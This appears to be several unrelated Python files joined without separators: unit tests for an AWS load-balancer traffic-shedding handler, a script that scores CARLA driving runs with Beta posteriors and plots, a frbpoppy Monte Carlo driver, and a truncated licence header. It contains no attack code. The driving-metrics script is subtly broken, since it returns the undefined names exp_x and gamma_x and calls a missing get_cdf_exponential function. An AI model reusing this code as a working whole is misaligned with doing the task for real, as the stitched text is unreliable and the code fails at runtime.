self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn], 90) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'RESTORE', 'alarmArn': alb_alarm_event.alarm_arn, 'alarmName': alb_alarm_event.alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_shed(self) -> None: # previous action was SHED and CW alarm state is in ALARM sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.SHED ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_in_alarm, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 70) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 30) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 'albAlarmAction': 'SHED', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_shed_previous_restore(self) -> None: # previous action was RESTORE but CW alarm state is in ALARM sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_in_alarm, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 10) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'SHED', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore(self) -> None: # alarm state is OK and previous action was RESTORE sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 80 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 20 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 10) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 'albAlarmAction': 'RESTORE', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore_previous_shed(self) -> None: # alarm state is OK and previous action was SHED sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 80 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 20 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.SHED ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.RESTORE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 80) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 20) self.elbv2_client.modify_rule.assert_not_called() message_body = { 'albAlarmAction': 'RESTORE', 'alarmArn': self.cw_alarm_arn, 'alarmName': self.cw_alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.restore_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_status_message_restore_no_remaining_restore(self) -> None: # alarm state is OK and previous action was RESTORE. # no more loan remains to be restored sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alb_listener_rules_handler.elb_rules[0].forward_configs[self.target_group_arn] = 90 alb_listener_rules_handler.elb_rules[0].forward_configs[self.secondary_target_group_arn] = 10 alb_alarm_status_message = ALBAlarmStatusMessage( self.cw_alarm_arn, self.cw_alarm_name, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.sqs_queue_url, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, ALBAlarmAction.RESTORE ) alarm_action = alb_listener_rules_handler.handle_alarm_status_message( self.cw_client_ok, self.elbv2_client, sqs_client, alb_alarm_status_message) self.assertEqual(alarm_action, ALBAlarmAction.NONE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 100) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.secondary_target_group_arn), 0) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) sqs_client.send_message.assert_not_called() return import numpy as np import csv import matplotlib.pyplot as plt from matplotlib import rc rc('text', usetex=True) from scipy.special import gamma as scigamma from scipy.special import gammaln as scigammaln from collections import OrderedDict def split_into_tasks(reader): out = list() tmp = OrderedDict() last_weather = -1 last_start = -1 last_end = -1 for row in reader: weather = row['weather'] startp = row['start_point'] endp = row['end_point'] if weather != last_weather or startp != last_start or endp != last_end: # Add new task if tmp: out.append(tmp) tmp = OrderedDict() last_weather = weather last_start = startp last_end = endp if tmp: for key in row: tmp[key].append(float(row[key])) else: for key in row: tmp[key] = [float(row[key])] # tmp.update(row) if tmp: out.append(tmp) return out def get_total_distance_of_tasks(task_data): distance = list() for task in task_data: x_diff = np.diff(task['pos_x']) y_diff = np.diff(task['pos_y']) acc_dist = np.cumsum(np.sqrt(x_diff ** 2 + y_diff ** 2)) distance.append(acc_dist[-1]) return np.asarray(distance) def get_successful_tasks(task_data, key): successes = list() for task in task_data: data = np.asarray(task[key]) if np.any(data > 0): successes.append(False) else: successes.append(True) return np.asarray(successes) def get_distance_between_infractions(task_data, key): distances = list() acc_dist = 0 for task in task_data: data = np.array(task[key]) x_diff = np.diff(task['pos_x']) y_diff = np.diff(task['pos_y']) distance = np.cumsum(np.sqrt(x_diff ** 2 + y_diff ** 2)) if not np.any(data > 0): # Accumulate distance between tasks acc_dist += distance[-1] continue indices = np.flatnonzero(data) distances.append(acc_dist + distance[indices[0] - 1]) # Reset accumulated distance for next infraction acc_dist = 0 if not distances: distances.append(acc_dist) return np.asarray(distances) def get_distance_to_first_infraction(task_data, key): distances = list() for task in task_data: data = np.array(task[key]) if not np.any(data > 0): continue x_diff = np.diff(task['pos_x']) y_diff = np.diff(task['pos_y']) distance = np.cumsum(np.sqrt(x_diff**2 + y_diff**2)) indices = np.flatnonzero(data) distances.append(distance[indices[0]-1]) return np.asarray(distances) def get_percentage_under_infraction(task_data, key, threshold): percentages = list() if type(key) != list: key = [key] for task in task_data: data = list() for k in key: data.append(np.asarray(task[k])) data = np.asarray(data) infractions = data > threshold infractions = np.logical_or.reduce(infractions) percentages.append(np.sum(infractions) / data.shape[1]) return np.asarray(percentages) def get_hist_of_infractions(task_data, nbins=100): data_offroad = [] data_otherside = [] for task in task_data: data_offroad += task['intersection_offroad'] data_otherside += task['intersection_otherlane'] data_offroad = np.asarray(data_offroad) data_otherside = np.asarray(data_otherside) data = np.concatenate((data_offroad, -data_otherside)) hist = np.histogram(data, bins=nbins, range=(-1, 1)) return data def estimate_binomial_distribution(success_statuses): s = np.sum(success_statuses) f = len(success_statuses) - s return s, f def estimate_beta_distribution(distances): dist = np.array(distances, dtype=np.float) x = np.mean(dist) v = np.var(dist) alpha = x * (x*(1-x) / v - 1) beta = (1 - x) * (x*(1-x) / v - 1) return alpha, beta def get_pdf_beta_posterior(s, f, prior='jeffreys'): x = np.linspace(0.05, 0.95, 100) if prior == 'bayes': pdf = (x**s * (1-x)**f) * scigamma(s + f + 2) / (scigamma(s + 1) * scigamma(f + 1)) elif prior == 'jeffreys': pdf = (x ** (s-0.5) * (1 - x) ** (f-0.5)) * scigamma(s + f + 1) / (scigamma(s + 0.5) * scigamma(f + 0.5)) return pdf, x def get_pdf_beta_posterior_in_logarithm(s, f, prior='jeffreys'): x = np.linspace(0.001, 0.999, 1000) lx= np.log(x) lnx = np.log(1-x) if prior == 'jeffreys': lpdf = (s-0.5)*lx + (f-0.5)*lnx + scigammaln(s + f + 1) - scigammaln(s + 0.5) - scigammaln(f + 0.5) return np.exp(lpdf), x def get_pdf_for_infractions(filename): with open(filename, newline='') as csvfile: reader = csv.DictReader(csvfile) # Split measurments into tasks tasks = split_into_tasks(reader) infr_dists_other = get_distance_between_infractions(tasks, 'collision_other') infr_dists_pedestrian = get_distance_between_infractions(tasks, 'collision_pedestrians') infr_dists_vehicle = get_distance_between_infractions(tasks, 'collision_vehicles') # Estimate for accidents gamma_distr = list() # Estimate for accidents exp_distr = list() # Estimate for percentage of non-collision successes_other = get_successful_tasks(tasks, 'collision_other') successes_pedestrians = get_successful_tasks(tasks, 'collision_pedestrians') successes_vehicles = get_successful_tasks(tasks, 'collision_vehicles') beta_distr = list() s, f = estimate_binomial_distribution(successes_other) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) coll_free = {'s': s, 'f': f} beta_distr.append({'pdf': pdf, 'params': (s, f)}) s, f = estimate_binomial_distribution(successes_pedestrians) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_distr.append({'pdf': pdf, 'params': (s, f)}) s, f = estimate_binomial_distribution(successes_vehicles) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_distr.append({'pdf': pdf, 'params': (s, f)}) beta_x = x return exp_distr, gamma_distr, beta_distr, tasks, exp_x, gamma_x, beta_x, coll_free def get_success_status(filename): success = list() with open(filename, newline='') as csvfile: reader = csv.DictReader(csvfile) for line in reader: reached_goal = int(line['result']) success.append(reached_goal == 1) return success def calculate_KL_divergence_exponential(lambda1, lambda2): """ Calculates distance from true distribution to approximate distribution Args: lambda1: "True" distribution lambda2: "Approximate" distribution Returns: KL divergence """ return np.log(lambda1) - np.log(lambda2) + lambda2 / lambda1 - 1 def sample_from_exponential_bayesian(data, a=1, b=1, nsamples=100): dist = np.asarray(data) xbar = np.mean(dist) n = len(dist) ls = np.random.gamma(a+n, 1/(b+n*xbar), nsamples) for l in ls: cdf, x = get_cdf_exponential(l) plt.plot(x, cdf) plt.show() if __name__ == '__main__': #np.seterr(all='raise') # Metrics for GT models exp_distr = {} gamma_distr = {} beta_distr = {} task_data = {} exp_x = {} gamma_x = {} beta_x = {} results = {} beta_success = {} beta_success_x = {} folder_names = {} beta_success_acc = {} beta_coll_acc = {} keys = ['setting'] for k in keys: exp_distr[k] = list() gamma_distr[k] = list() beta_distr[k] = list() task_data[k] = list() exp_x[k] = list() gamma_x[k] = list() beta_x[k] = list() results[k] = list() beta_success[k] = list() beta_success_x[k] = list() folder_names[k] = list() beta_success_acc[k] = list() beta_coll_acc[k] = list() base_name = {'setting': 'path/to/carla_results_folder'} nums = {'setting': None} for key in base_name: if nums[key] is not None: for n in nums[key]: folder_names[key].append(base_name[key] + '{}'.format(n)) else: folder_names[key].append(base_name[key]) for key in folder_names: s_acc_goal = 0 f_acc_goal = 0 s_acc_coll = 0 f_acc_coll = 0 for folder in folder_names[key]: exp_distr1, gamma_distr1, beta_distr1, task_data1, exp_x1, gamma_x1, beta_x1, coll_free = get_pdf_for_infractions( folder + '/measurements.csv') reached_goal = get_success_status(folder + '/summary.csv') exp_distr[key].append(exp_distr1) gamma_distr[key].append(gamma_distr1) beta_distr[key].append(beta_distr1) task_data[key].append(task_data1) exp_x[key].append(exp_x1) gamma_x[key].append(gamma_x1) beta_x[key].append(beta_x1) results[key].append(reached_goal) s, f = estimate_binomial_distribution(reached_goal) #pdf, x = get_pdf_beta_posterior(s, f) pdf, x = get_pdf_beta_posterior_in_logarithm(s, f) beta_success[key].append(pdf) beta_success_x[key].append(x) s_acc_goal += s f_acc_goal += f s_acc_coll += coll_free['s'] f_acc_coll += coll_free['f'] if len(folder_names[key]) > 1: pdf, x = get_pdf_beta_posterior_in_logarithm(s_acc_goal, f_acc_goal) beta_success_acc[key] = {'pdf': pdf, 'x': x} pdf, x = get_pdf_beta_posterior_in_logarithm(s_acc_coll, f_acc_coll) beta_coll_acc[key] = {'pdf': pdf, 'x': x} # Estimate a ranking of the models offroad_percentage = {} otherlane_percentage = {} combined_percentage = {} distance = {} accomplished_tasks = {} collisionfree_tasks = {} score = {} best_idx = {} worst_idx = {} median_idx = {} for k in keys: offroad_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} otherlane_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} combined_percentage[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} distance[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} accomplished_tasks[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} collisionfree_tasks[k] = {"mean": -1, "median": -1, "best": -1, "worst": -1, "all": list()} score[k] = list() best_idx[k] = -1 worst_idx[k] = -1 median_idx[k] = -1 for key in keys: total_dist = 0. percentage_for_infraction = 0.2 for i, (task, beta_d, reached_goal) in enumerate(zip(task_data[key], beta_distr[key], results[key])): offroad_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, 'intersection_offroad', percentage_for_infraction))) otherlane_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, 'intersection_otherlane', percentage_for_infraction))) combined_percentage[key]["all"].append(100. * np.mean(get_percentage_under_infraction(task, ['intersection_offroad', 'intersection_otherlane'], percentage_for_infraction))) distance[key]["all"].append(np.sum(get_total_distance_of_tasks(task))) s, fails = beta_d[0]['params'] collisionfree_tasks[key]["all"].append( 100. * s / (s + fails) ) res = np.sum(reached_goal) accomplished_tasks[key]["all"].append(100 * res / len(reached_goal)) score[key].append((100. - combined_percentage[key]["all"][-1] + collisionfree_tasks[key]["all"][-1] + accomplished_tasks[key]["all"][-1])/300) scores = np.asarray(score[key]) best_idx[key] = np.argmax(scores) worst_idx[key] = np.argmin(scores) median_idx[key] = np.argmax(np.median(scores) == scores) offroad_percentage[key]["best"] = offroad_percentage[key]["all"][best_idx[key]] offroad_percentage[key]["worst"] = offroad_percentage[key]["all"][worst_idx[key]] offroad_percentage[key]["median"] = np.median(offroad_percentage[key]["all"]) #[median_idx[key]] offroad_percentage[key]["mean"] = np.mean(offroad_percentage[key]["all"]) otherlane_percentage[key]["best"] = otherlane_percentage[key]["all"][best_idx[key]] otherlane_percentage[key]["worst"] = otherlane_percentage[key]["all"][worst_idx[key]] otherlane_percentage[key]["median"] = np.median(otherlane_percentage[key]["all"]) # [median_idx[key]] otherlane_percentage[key]["mean"] = np.mean(otherlane_percentage[key]["all"]) combined_percentage[key]["best"] = combined_percentage[key]["all"][best_idx[key]] combined_percentage[key]["worst"] = combined_percentage[key]["all"][worst_idx[key]] combined_percentage[key]["median"] = np.median(combined_percentage[key]["all"]) # [median_idx[key]] combined_percentage[key]["mean"] = np.mean(combined_percentage[key]["all"]) accomplished_tasks[key]["best"] = accomplished_tasks[key]["all"][best_idx[key]] accomplished_tasks[key]["worst"] = accomplished_tasks[key]["all"][worst_idx[key]] accomplished_tasks[key]["median"] = np.median(accomplished_tasks[key]["all"]) # [median_idx[key]] accomplished_tasks[key]["mean"] = np.mean(accomplished_tasks[key]["all"]) collisionfree_tasks[key]["best"] = collisionfree_tasks[key]["all"][best_idx[key]] collisionfree_tasks[key]["worst"] = collisionfree_tasks[key]["all"][worst_idx[key]] collisionfree_tasks[key]["median"] = np.median(collisionfree_tasks[key]["all"]) # [median_idx[key]] collisionfree_tasks[key]["mean"] = np.mean(collisionfree_tasks[key]["all"]) distance[key]["best"] = distance[key]["all"][best_idx[key]] distance[key]["worst"] = distance[key]["all"][worst_idx[key]] distance[key]["median"] = np.median(distance[key]["all"]) # [median_idx[key]] distance[key]["mean"] = np.mean(distance[key]["all"]) colours = ['cyan', 'brown', 'purple', 'red', 'blue', 'green'] for i, key in enumerate(keys): plt.plot(beta_x[key][best_idx[key]], beta_distr[key][best_idx[key]][0]['pdf'], label=key, lw=3, color=colours[i]) import matplotlib.patches as mpatches red_patch = mpatches.Patch(color='red', label='T*D*') purple_patch = mpatches.Patch(color='blue', label='RL') brown_path = mpatches.Patch(color='green', label='IL') plt.legend(handles=[red_patch, purple_patch, brown_path], loc='upper left', fontsize=24) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{\neg Collision} = x\%)$', fontsize=30) plt.show() for i, key in enumerate(keys): plt.plot(beta_success_x[key][best_idx[key]], beta_success[key][best_idx[key]], label=key, lw=3, color=colours[i]) plt.legend(handles=[red_patch, purple_patch, brown_path], loc='upper left', fontsize=24) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{Success} = x\%)$', fontsize=30) plt.subplots_adjust(hspace=0.05, wspace=0) plt.show() # Plot the success rate for all models in a specific training condition blue_patch = mpatches.Patch(color='blue', label='TGDG') orange_patch = mpatches.Patch(color='orange', label='TGDE') green_patch = mpatches.Patch(color='green', label='TEDE') red_patch = mpatches.Patch(color='red', label='TEDG') for i, key in enumerate(keys): if beta_success_acc[key]: plt.plot(beta_success_acc[key]['x'], beta_success_acc[key]['pdf'], label=key, lw=3) plt.legend(handles=[blue_patch, orange_patch, green_patch, red_patch], loc='upper left', fontsize=20) plt.ylim([0, 45]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{Success} = x\%)$', fontsize=30) plt.savefig('results/betaSuccessTot.pdf', bbox_inches='tight') plt.show() # Plot the success rate for all models in a specific training condition for i, key in enumerate(keys): if beta_coll_acc[key]: plt.plot(beta_coll_acc[key]['x'], beta_coll_acc[key]['pdf'], label=key, lw=3) plt.legend(handles=[blue_patch, orange_patch, green_patch, red_patch], loc='upper left', fontsize=20) plt.ylim([0, 30]) plt.xlim([0, 1]) plt.yticks([]) plt.xticks([0, 0.25, 0.5, 0.75, 1.0], ['0\%', '25\%', '50\%', '75\%', '100\%'], fontsize=28) plt.ylabel(r'$P(p_{\neg Collision} = x\%)$', fontsize=30) plt.savefig('results/betaCollTot.pdf', bbox_inches='tight') plt.show() # Plotting histogram for out-of-road fig = plt.figure() nfigs = len(task_data) nbins = 13 for j, key in enumerate(keys): nmodels = 1 # len(task_data[key]) td = task_data[key][best_idx[key]] plt.subplot(nfigs, 1, j+1) hist_data = get_hist_of_infractions(td) plt.hist2d(hist_data, np.zeros_like(hist_data), bins=[nbins, 1], range=[[-1, 1], [0, 0]], normed=True) plt.yticks([]) #np.arange(0, nmodels), fontsize=14) plt.ylabel(key, fontsize=14) plt.ylim([-0.5, nmodels - 0.5]) plt.xticks([]) ax = plt.gca() ax.set_xticks(np.linspace(-1, 1, nbins+1), minor=True) ax.set_yticks(np.arange(-0.5, nmodels - 0.5, 1), minor=True) plt.grid(which='minor', lw=0.5, c='k') plt.xticks([-1., -0.5, 0., 0.5, 1.], ['100\%', '50\%', '0\%', '50\%', '100\%'], fontsize=28) fig.subplots_adjust(hspace=0.05, wspace=0) plt.show() # Plotting histogram for out-of-road for each model set fig = plt.figure() nfigs = len(task_data) nbins = 13 for j, key in enumerate(keys): nmodels = 1 # len(task_data[key]) hist_data = np.zeros(nbins) for td in task_data[key]: hist_data = np.concatenate((hist_data,get_hist_of_infractions(td))) plt.subplot(nfigs, 1, j + 1) plt.hist2d(hist_data, np.zeros_like(hist_data), bins=[nbins, 1], range=[[-1, 1], [0, 0]], normed=True) plt.yticks([]) plt.ylabel(key, fontsize=14) plt.ylim([-0.5, nmodels - 0.5]) plt.xticks([]) ax = plt.gca() ax.set_xticks(np.linspace(-1, 1, nbins + 1), minor=True) ax.set_yticks(np.arange(-0.5, nmodels - 0.5, 1), minor=True) plt.grid(which='minor', lw=0.5, c='k') plt.xticks([-1., -0.5, 0., 0.5, 1.], ['100\%', '50\%', '0\%', '50\%', '100\%'], fontsize=28) fig.subplots_adjust(hspace=0.05, wspace=0) plt.show() macrocosme/frbpoppy """Link together all classes to run a full Monte Carlo.""" import pandas as pd import numpy as np import frbpoppy.paths import os from simulations import MonteCarlo, POP_SIZE from goodness_of_fit import GoodnessOfFit from plot import Plot GENERATE = True CALC_GOFS = True RUNS = [10] class RunOverview: """Gather input for each run.""" def __init__(self, load_csv=True): p = frbpoppy.paths.populations() self.filename = f'{p}mc/run_overview.csv' if load_csv and os.path.isfile(self.filename): self.df = self.load() else: self.df = self.gen_runs() def gen_run(self): return {'alpha': None, 'si': None, 'li': None, 'lum_min': None, 'lum_max': None, 'w_mean': None, 'w_std': None, 'dm_igm_slope': None, 'dm_host': None, 'execute': True, 'par_set': 0, 'run': 0} def gen_runs(self): runs = [] for i in range(10): r = self.gen_run() r['run_number'] = i + 1 r['execute'] = True r['par_set'] = i % 4 + 1 if i == 9: # Holder for best values r['execute'] = False runs.append(r) df = pd.DataFrame(runs) df.set_index('run', inplace=True) return df def load(self): df = pd.read_csv(self.filename) df.run = df.run.astype(int) df.par_set = df.par_set.astype(int) df = df.loc[:, ~df.columns.str.contains('^Unnamed')] return df def save(self, df=None): if df is None: df = self.df df.to_csv(self.filename) if __name__ == '__main__': print('Commencing') runs = RunOverview(load_csv=True) mc = MonteCarlo(pop_size=POP_SIZE) for i, run in runs.df.iterrows(): run = runs.df.iloc[i] print('='*50) print(f'On Run {run.run} with par_set {run.par_set}') print('='*50) print(run) if run.run not in RUNS: continue # Generate parameter sets if GENERATE: if run.par_set == 1: mc.gen_par_set_1(lum_min=run.lum_min, lum_max=run.lum_max, w_mean=run.w_mean, w_std=run.w_std, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 2: mc.gen_par_set_2(alpha=run.alpha, si=run.si, w_mean=run.w_mean, w_std=run.w_std, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 3: mc.gen_par_set_3(alpha=run.alpha, si=run.si, li=run.li, lum_min=run.lum_min, lum_max=run.lum_max, dm_igm_slope=run.dm_igm_slope, dm_host=run.dm_host, run=run.run) if run.par_set == 4: mc.gen_par_set_4(alpha=run.alpha, si=run.si, li=run.li, lum_min=run.lum_min, lum_max=run.lum_max, w_mean=run.w_mean, w_std=run.w_std, run=run.run) # Determine the goodness of fit gf = GoodnessOfFit() if CALC_GOFS: gf.calc_gofs(run.run) # Find global maximums gf = GoodnessOfFit() gms = gf.calc_global_max(run.run) print('\n') print(f' Best fits from run {run.run}-> {gms}') print('\n') # Adapt the input for future runs for j in range(i+1, len(runs.df)): for par in gms: runs.df.at[j, par] = gms[par][0] runs.save() Plot() #!/usr/bin/env python3 # Copyright 2020 # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND 